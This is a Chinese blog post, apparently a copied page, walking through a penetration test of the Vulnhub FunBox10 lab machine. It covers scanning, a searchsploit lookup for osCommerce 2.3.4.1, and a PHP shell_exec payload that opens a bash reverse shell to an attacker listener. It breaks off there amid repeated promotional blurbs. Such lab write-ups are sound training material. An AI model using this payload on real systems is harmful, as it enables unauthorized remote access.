admin管理员组文章数量:1602102
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以戳这里获取
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Vulnhub靶机FunBox10(Under Construction)渗透测试详解
-
- Vulnhub靶机介绍:
- Vulnhub靶机下载:
- Vulnhub靶机安装:
- Vulnhub靶机漏洞详解:
-
-
- ①:信息收集:
- ②:漏洞利用:
- ③:pspy64提权:
- ④:获取flag:
- ①:信息收集:
-
- Vulnhub靶机渗透总结:
- Vulnhub靶机介绍:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
老样子需要找到flag即可。
Vulnhub靶机下载:
https://download.vulnhub/funbox/Funbox10.ova/
Vulnhub靶机安装:
下载好了把安装包解压 然后导入Oracle VM
打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :172.16.5.117 靶机IP :172.16.5.108
ping
的通 环境搭建成功!
通过nmap
扫描发现开启了22,25
和80,110,143
端口 访问80
端口 简单dirb
扫描一下
②:漏洞利用:
查看相关漏洞:searchsploit osCommerce 2.3.4.1
发现了 44374.py
进行漏洞利用。
'shell\_exec("bash -c \'bash -i >& /dev/tcp/172.16.5.17/7777 0>&1\'");'
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以戳这里获取
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
**
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
版权声明:本文标题:看完这篇 教你玩转渗透测试靶机vulnhub——FunBox10(Under Construction)_pspy64(1) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1728396553a1157073.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论